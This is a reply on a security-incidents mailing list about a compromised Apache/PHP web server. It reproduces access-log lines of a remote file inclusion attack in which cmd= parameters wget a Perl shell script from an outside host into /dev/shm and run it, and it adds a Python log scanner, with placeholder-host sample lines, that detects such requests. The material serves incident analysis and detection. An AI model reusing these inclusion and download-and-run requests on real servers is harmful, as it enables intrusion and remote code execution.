Security Incidents mailing list archives

Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)


From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:52:23 -0700

Just one correction: I said the logs were useless... that's not quite true.

66.119.34.39 - - [06/Jul/2004:17:47:05 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/var/tmp/...;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:17 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20//dev/shm;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:19 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:33 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:47:40 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 10479
66.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:48:30 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10084
66.119.34.39 - - [06/Jul/2004:17:48:37 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20shhell.pl HTTP/1.1" 200 10137
66.119.34.39 - - [06/Jul/2004:17:48:51 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20shell.pl HTTP/1.1" 200 10068
66.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20.shell HTTP/1.1" 200 10134
66.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /favicon.ico HTTP/1.1" 404 298
66.119.34.39 - - [08/Jul/2004:20:14:03 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10084
66.119.34.39 - - [08/Jul/2004:20:14:10 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://members.lycos.co.uk/lotsen5k/.shell HTTP/1.1" 200 10473
66.119.34.39 - - [08/Jul/2004:20:14:15 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20.shell HTTP/1.1" 200 10068

I can sleep well tonight,

Nathan
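A small detector for the pattern those log lines show (a remote URL in an include-style parameter such as PAGE=, plus a shell command in cmd=), added here as an example and not code from the original thread or from anyone on it. The parser and the sample log lines are my own; the sample is constructed after the post's log format with placeholder hosts and addresses, and the parameter names are the ones seen in the post.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache common/combined log prefix: client, identd, user, timestamp,
# request line, status, bytes. Referer and agent fields, if any, are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Shell separators or downloader/interpreter names inside a decoded parameter value.
SHELL_CMD = re.compile(r'[;|&`]|\b(wget|curl|perl|sh|bash)\b')

def parse_line(line):
    """Parse one access-log line; 'params' holds (name, decoded value) pairs.
    The query is split only on '&' so a ';' inside a value survives."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = []
    for part in urlsplit(rec["target"]).query.split("&"):
        if part:
            name, _, value = part.partition("=")
            rec["params"].append((unquote(name), unquote(value)))
    return rec

def rfi_findings(line):
    """Return (ip, timestamp, status, reasons) when a request carries a remote
    URL in a parameter and/or a shell command, otherwise None."""
    rec = parse_line(line)
    if rec is None:
        return None
    reasons = []
    for name, value in rec["params"]:
        if REMOTE_URL.match(value):
            reasons.append(f"{name}= points at a remote URL (file inclusion)")
        elif SHELL_CMD.search(value):
            reasons.append(f"{name}= carries a shell command: {value!r}")
    return (rec["ip"], rec["ts"], rec["status"], reasons) if reasons else None

# Constructed sample, modeled on the post's log format; hosts are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://evil.example.net/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://files.example.net/shell.pl HTTP/1.1" 200 10479',
    '198.51.100.7 - - [08/Jul/2004:20:13:59 -0700] "GET /favicon.ico HTTP/1.1" 404 298',
    '203.0.113.9 - - [08/Jul/2004:20:15:01 -0700] "GET /index.php?PAGE=about HTTP/1.1" 200 5120',
]

def scan(lines):
    """Flagged entries only; a 200 status means the include (and command) ran."""
    return [f for f in map(rfi_findings, lines) if f]
```

Run over a real access log, a 200 on a flagged line is the signal that the include succeeded, which is exactly what every flagged entry in the post shows.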



Dmitry Alyabyev wrote:

On Saturday 10 July 2004 04:40, Tim Greer wrote:

[skip]

Sounds like one of the many PHP scripts is exploitable.  You could run
PHP as CGI w/ the suexec wrapper (and even tweak the source or use an
existing patch so PHP scripts don't need to be modified at all (other
than the ownership of some files/dirs PHP scripts need to use/write to)).

Not really - you will lose authentication within PHP scripts, in the sense of receiving the password via the environment, and some add-ons like Zend Optimizer will stop working.
